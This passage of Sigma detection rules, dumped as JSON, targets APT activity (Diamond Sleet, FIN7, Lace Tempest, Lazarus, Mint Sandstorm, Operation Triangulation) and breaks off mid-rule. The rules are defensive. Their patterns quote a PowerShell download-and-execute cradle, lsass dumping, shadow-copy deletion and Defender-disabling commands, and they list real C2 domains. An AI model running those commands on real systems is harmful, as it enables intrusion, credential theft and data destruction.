Registry](./registry_event_apt_diamond_sleet_scheduled_task.yml)\n- [Diamond Sleet APT Scheduled Task Creation](./win_security_apt_diamond_sleet_scheduled_task.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml",
    "content": "title: Diamond Sleet APT DNS Communication Indicators\nid: fba38e0f-4607-4344-bb8f-a4b50cdeef7f\nstatus: test\ndescription: Detects DNS queries related to Diamond Sleet APT activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains:\n            - '3dkit.org'\n            - 'dersmarketim.com'\n            - 'galerielamy.com'\n            - 'olidhealth.com'\n    condition: selection\nfalsepositives:\n    - Might generate some false positive if triggered by a user during investigation for example.\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/file_event_win_apt_diamond_sleet_indicators.yml",
    "content": "title: Diamond Sleet APT File Creation Indicators\nid: e1212b32-55ff-4dfb-a595-62b572248056\nstatus: test\ndescription: Detects file creation activity that is related to Diamond Sleet APT activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - ':\\ProgramData\\4800-84DC-063A6A41C5C'\n            - ':\\ProgramData\\clip.exe'\n            - ':\\ProgramData\\DSROLE.dll'\n            - ':\\ProgramData\\Forest64.exe'\n            - ':\\ProgramData\\readme.md'\n            - ':\\ProgramData\\Version.dll'\n            - ':\\ProgramData\\wsmprovhost.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/image_load_apt_diamond_sleet_side_load.yml",
    "content": "title: Diamond Sleet APT DLL Sideloading Indicators\nid: d1b65d98-37d7-4ff6-b139-2d87c1af3042\nstatus: test\ndescription: Detects DLL sideloading activity seen used by Diamond Sleet APT\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection_1:\n        Image|endswith: ':\\ProgramData\\clip.exe'\n        ImageLoaded|endswith: ':\\ProgramData\\Version.dll'\n    selection_2:\n        Image|endswith: ':\\ProgramData\\wsmprovhost.exe'\n        ImageLoaded|endswith: ':\\ProgramData\\DSROLE.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml",
    "content": "title: Diamond Sleet APT Process Activity Indicators\nid: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2\nstatus: test\ndescription: Detects process creation activity indicators related to Diamond Sleet APT\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: ' uTYNkfKxHiZrx3KJ'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml",
    "content": "title: Diamond Sleet APT Scheduled Task Creation - Registry\nid: 9f9f92ba-5300-43a4-b435-87d1ee571688\nstatus: test\ndescription: |\n    Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'Windows TeamCity Settings User Interface'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Diamond-Sleet/win_security_apt_diamond_sleet_scheduled_task.yml",
    "content": "title: Diamond Sleet APT Scheduled Task Creation\nid: 3b8e5084-4de9-449a-a40d-0e11014f2e2d\nstatus: test\ndescription: |\n    Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID: 4698\n        TaskName: '\\Windows TeamCity Settings User Interface'\n        TaskContent|contains: 'uTYNkfKxHiZrx3KJ'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/EquationGroup/net_dns_apt_equation_group_triangulation_c2_coms.yml",
    "content": "title: Potential Operation Triangulation C2 Beaconing Activity - DNS\nid: 7fc30d63-728d-48d9-ad6f-14d14f4accf7\nrelated:\n    - id: aa03c712-75c6-438b-8d42-de88f2427e09 # Proxy C2\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB\nreferences:\n    - https://securelist.com/operation-triangulation/109842/\n    - https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.command-and-control\n    - attack.g0020\n    - detection.emerging-threats\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query:\n            - 'addatamarket.net'\n            - 'ans7tv.net'\n            - 'anstv.net'\n            - 'backuprabbit.com'\n            - 'businessvideonews.com'\n            - 'cloudsponcer.com'\n            - 'datamarketplace.net'\n            - 'growthtransport.com'\n            - 'mobilegamerstats.com'\n            - 'snoweeanalytics.com'\n            - 'tagclick-cdn.com'\n            - 'topographyupdates.com'\n            - 'unlimitedteacup.com'\n            - 'virtuallaughing.com'\n            - 'web-trackers.com'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/EquationGroup/proxy_apt_equation_group_triangulation_c2_coms.yml",
    "content": "title: Potential Operation Triangulation C2 Beaconing Activity - Proxy\nid: aa03c712-75c6-438b-8d42-de88f2427e09\nrelated:\n    - id: 7fc30d63-728d-48d9-ad6f-14d14f4accf7 # DNS C2\n      type: similar\nstatus: test\ndescription: Detects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB\nreferences:\n    - https://securelist.com/operation-triangulation/109842/\n    - https://www-fsb-ru.translate.goog/fsb/press/message/single.htm!id=10439739@fsbMessage.html?_x_tr_sch=http&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=de&_x_tr_pto=wapp\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-06-01\ntags:\n    - attack.command-and-control\n    - attack.g0020\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-host|contains:\n            - 'addatamarket.net'\n            - 'ans7tv.net'\n            - 'anstv.net'\n            - 'backuprabbit.com'\n            - 'businessvideonews.com'\n            - 'cloudsponcer.com'\n            - 'datamarketplace.net'\n            - 'growthtransport.com'\n            - 'mobilegamerstats.com'\n            - 'snoweeanalytics.com'\n            - 'tagclick-cdn.com'\n            - 'topographyupdates.com'\n            - 'unlimitedteacup.com'\n            - 'virtuallaughing.com'\n            - 'web-trackers.com'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/README.md",
    "content": "# FIN7 Targets Veeam Backup Servers\n\n## Summary\n\nWithSecure Labs reported on the 26th of April 2023 on attacks their intelligence teams identified in late March 2023 against internet-facing servers running Veeam Backup & Replication software.\n\nYou can find more information on the threat in the following articles:\n\n- [FIN7 tradecraft seen in attacks against Veeam backup servers](https://labs.withsecure.com/publications/fin7-target-veeam-servers)\n\n## Rules\n\n- [Potential APT FIN7 Related PowerShell Script Created](./file_event_win_apt_fin7_powershell_scripts_naming_convention.yml)\n- [Potential APT FIN7 POWERHOLD Execution](./posh_ps_apt_fin7_powerhold.yml)\n- [Potential POWERTRASH Script Execution](./posh_ps_apt_fin7_powertrash_execution.yml)\n- [Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity](./proc_creation_win_apt_fin7_powertrash_lateral_movement.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml",
    "content": "title: Potential APT FIN7 Related PowerShell Script Created\nid: a88d9f45-ec8a-4b0e-85ee-c9f6a65e9128\nstatus: test\ndescription: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|endswith: '_64refl.ps1'\n        - TargetFilename: 'host_ip.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powerhold.yml",
    "content": "title: Potential APT FIN7 POWERHOLD Execution\nid: 71c432c4-e4da-4eab-ba49-e60ea9a81bca\nstatus: test\ndescription: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '$env:APPDATA'\n            - 'function MainPayload'\n            - '::WriteAllBytes'\n            - 'wscript.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/posh_ps_apt_fin7_powertrash_execution.yml",
    "content": "title: Potential POWERTRASH Script Execution\nid: 4e19528a-f081-40dd-be09-90c39352bd64\nstatus: test\ndescription: Detects potential execution of the PowerShell script POWERTRASH\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'IO.Compression.DeflateStream'\n            - 'IO.MemoryStream'\n            - '::FromBase64String'\n            - 'GetDelegateForFunctionPointer'\n            - '.Invoke()'\n            - 'GlobalAssemblyCache'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml",
    "content": "title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity\nid: 911389c7-5ae3-43ea-bab3-a947ebdeb85e\nstatus: test\ndescription: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - '-noni -nop -exe bypass -f \\\\\\\\'\n            - 'ADMIN$'\n    selection_2:\n        CommandLine|contains|all:\n            - '-ex bypass -noprof -nolog -nonint -f'\n            - 'C:\\Windows\\Temp\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/README.md",
    "content": "# Lace Tempest SysAid CVE-2023-47246 Exploitation\n\n## Summary\n\nA zero-day vulnerability in the SysAid on-premises software was exploited by DEV-0950 (Lace Tempest). Where the threat actor uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. The WebShell provided the attacker with unauthorized access and control over the affected system. Subsequently, the attacker utilized a PowerShell script, deployed through the WebShell, to execute a malware loader named user.exe on the compromised host, which was used to load the GraceWire trojan\n\nYou can find more information on the threat in the following articles:\n\n- [SysAid On-Prem Software CVE-2023-47246 Vulnerability](https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification)\n\n## Rules\n\n- [Lace Tempest File Indicators](./file_event_win_apt_lace_tempest_indicators.yml)\n- [Lace Tempest PowerShell Evidence Eraser](./posh_ps_apt_lace_tempest_eraser_script.yml)\n- [Lace Tempest PowerShell Launcher](./posh_ps_apt_lace_tempest_malware_launcher.yml)\n- [Lace Tempest Cobalt Strike Download](./proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml)\n- [Lace Tempest Malware Loader Execution](./proc_creation_win_apt_lace_tempest_loader_execution.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml",
    "content": "title: Lace Tempest File Indicators\nid: e94486ea-2650-4548-bf25-88cbd0bb32d7\nstatus: test\ndescription: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|endswith:\n              - ':\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe'\n              - ':\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war'\n              - ':\\Program Files\\SysAidServer\\tomcat\\webapps\\leave'\n        - TargetFilename|contains: ':\\Program Files\\SysAidServer\\tomcat\\webapps\\user.'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml",
    "content": "title: Lace Tempest PowerShell Evidence Eraser\nid: b377ddab-502d-4519-9e8c-5590033d2d70\nstatus: test\ndescription: |\n    Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'cleanLL'\n            - 'usersfiles.war'\n            - 'Remove-Item -Path \"$tomcat_dir'\n            - 'SysAidServer'\n            - 'sleep '\n            - 'while(1)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml",
    "content": "title: Lace Tempest PowerShell Launcher\nid: 37dc5463-f7e3-4f61-ad76-ba59cd02a651\nstatus: test\ndescription: |\n    Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '\\SysAidServer\\tomcat\\webapps'\n            - 'Starting user.exe'\n            - '\\usersfiles\\user.exe'\n            - 'Remove-Item -Force \"$wapps'\n            - '(Sophos).'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml",
    "content": "title: Lace Tempest Cobalt Strike Download\nid: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d\nstatus: test\ndescription: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(\n            - /a')\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml",
    "content": "title: Lace Tempest Malware Loader Execution\nid: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d\nstatus: test\ndescription: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: ':\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe'\n    selection_hash:\n        Hashes|contains: 'SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lazarus/README.md",
    "content": "# Lazarus APT\n\nLast Updated: 18/10/2023\n\n## Summary\n\nESET researchers have uncovered a Lazarus attack against an aerospace company in Spain, where the group deployed several tools, most notably a publicly undocumented backdoor that ESET is naming LightlessCan. Lazarus operators obtained initial access to the company’s network last year after a successful spearphishing campaign, masquerading as a recruiter for Meta – the company behind Facebook, Instagram, and WhatsApp. Four different execution chains were identified, delivering three types of payloads via DLL side-loading.\n\nYou can find more information on the threat in the following articles:\n\n- [Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company](https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/)\n- [Lazarus hackers breach aerospace firm with new LightlessCan malware](https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/)\n\n## Rules\n\n- [Lazarus APT DLL Sideloading Activity](./image_load_apt_lazarus_side_load_activity.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml",
    "content": "title: Lazarus APT DLL Sideloading Activity\nid: 24007168-a26b-4049-90d0-ce138e13a5cf\nstatus: test\ndescription: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company\nreferences:\n    - https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/\n    - https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/\nauthor: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-18\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1574.001\n    - attack.g0032\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection_mscoree:\n        Image: 'C:\\ProgramShared\\PresentationHost.exe'\n        ImageLoaded: ':\\ProgramShared\\mscoree.dll'\n    selection_colorui:\n        Image: 'C:\\ProgramData\\Adobe\\colorcpl.exe'\n        ImageLoaded: 'C:\\ProgramData\\Adobe\\colorui.dll'\n    selection_mapistub:\n        Image: 'C:\\ProgramData\\Oracle\\Java\\fixmapi.exe'\n        ImageLoaded: 'C:\\ProgramData\\Oracle\\Java\\mapistub.dll'\n    selection_hid:\n        Image: 'C:\\ProgramData\\Adobe\\ARM\\tabcal.exe'\n        ImageLoaded: 'C:\\ProgramData\\Adobe\\ARM\\HID.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/README.md",
    "content": "# Mint Sandstorm / PHOSPHORUS\n\nLast Updated: 20/04/2023\n\n## Summary\n\nOn April 18th 2023 Microsoft Threat Intelligence team reported on a new nation state activity they're tracking as Mint Sandstorm (previously tracked as PHOSPHORUS).\n\nYou can find more information on the threat in the following articles:\n\n- [Nation-state threat actor Mint Sandstorm refines tradecraft to attack high-value targets](https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/)\n\n## Rules\n\n- [Mint Sandstorm - AsperaFaspex Suspicious Process Execution](./proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml)\n- [Mint Sandstorm - Log4J Wstomcat Process Execution](./proc_creation_win_apt_mint_sandstorm_log4J_wstomcat_execution.yml)\n- [Mint Sandstorm - ManageEngine Suspicious Process Execution](./proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml",
    "content": "title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution\nid: 91048c0d-5b81-4b85-a099-c9ee4fb87979\nstatus: test\ndescription: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nauthor: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)\ndate: 2023-04-20\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains|all:\n            - 'aspera'\n            - '\\ruby'\n    selection_special_child_powershell_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n    selection_special_child_powershell_cli:\n        - CommandLine|contains:\n              - ' echo '\n              - '-dumpmode'\n              - '-ssh'\n              - '.dmp'\n              - 'add-MpPreference'\n              - 'adscredentials'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'csvhost.exe'\n              - 'DownloadFile'\n              - 'DownloadString'\n              - 'dsquery'\n              - 'ekern.exe'\n              - 'FromBase64String'\n              - 'iex '\n              - 'iex('\n              - 'Invoke-Expression'\n              - 'Invoke-WebRequest'\n              - 'localgroup administrators'\n              - 'o365accountconfiguration'\n              - 'samaccountname='\n              - 'set-MpPreference'\n              - 'svhost.exe'\n              - 'System.IO.Compression'\n              - 'System.IO.MemoryStream'\n              - 'usoprivate'\n              - 'usoshared'\n              - 'whoami'\n        - CommandLine|re:\n              - '[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}'\n              - 'net\\s+user'\n   
           - 'net\\s+group'\n              - 'query\\s+session'\n    selection_special_child_lsass_1:\n        CommandLine|contains: 'lsass'\n    selection_special_child_lsass_2:\n        CommandLine|contains:\n            - 'procdump'\n            - 'tasklist'\n            - 'findstr'\n    selection_child_wget:\n        Image|endswith: '\\wget.exe'\n        CommandLine|contains: 'http'\n    selection_child_curl:\n        Image|endswith: '\\curl.exe'\n        CommandLine|contains: 'http'\n    selection_child_script:\n        CommandLine|contains:\n            - 'E:jscript'\n            - 'e:vbscript'\n    selection_child_localgroup:\n        CommandLine|contains|all:\n            - 'localgroup Administrators'\n            - '/add'\n    selection_child_net:\n        CommandLine|contains: 'net' # Covers net1\n        CommandLine|contains|all:\n            - 'user'\n            - '/add'\n    selection_child_reg:\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableAntiSpyware'\n              - '\\Microsoft\\Windows Defender'\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableRestrictedAdmin'\n              - 'CurrentControlSet\\Control\\Lsa'\n    selection_child_wmic_1:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'process call create'\n    selection_child_wmic_2:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'delete'\n            - 'shadowcopy'\n    selection_child_vssadmin:\n        CommandLine|contains|all:\n            - 'vssadmin'\n            - 'delete'\n            - 'shadows'\n    selection_child_wbadmin:\n        CommandLine|contains|all:\n            - 'wbadmin'\n            - 'delete'\n            - 'catalog'\n    condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml",
    "content": "title: Mint Sandstorm - Log4J Wstomcat Process Execution\nid: 7c97c625-0350-4f0a-8943-f6cadc88125e\nstatus: test\ndescription: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nauthor: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)\ndate: 2023-04-20\nmodified: 2023-11-29\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ws_tomcatservice.exe'\n    filter_main_repadmin:\n        Image|endswith: '\\repadmin.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml",
    "content": "title: Mint Sandstorm - ManageEngine Suspicious Process Execution\nid: 58d8341a-5849-44cd-8ac8-8b020413a31b\nstatus: test\ndescription: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nauthor: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)\ndate: 2023-04-20\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_path:\n        ParentImage|contains:\n            - 'manageengine'\n            - 'ServiceDesk'\n    selection_parent_image:\n        ParentImage|contains: '\\java'\n    selection_special_child_powershell_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n    selection_special_child_powershell_cli:\n        - CommandLine|contains:\n              - ' echo '\n              - '-dumpmode'\n              - '-ssh'\n              - '.dmp'\n              - 'add-MpPreference'\n              - 'adscredentials'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'csvhost.exe'\n              - 'DownloadFile'\n              - 'DownloadString'\n              - 'dsquery'\n              - 'ekern.exe'\n              - 'FromBase64String'\n              - 'iex 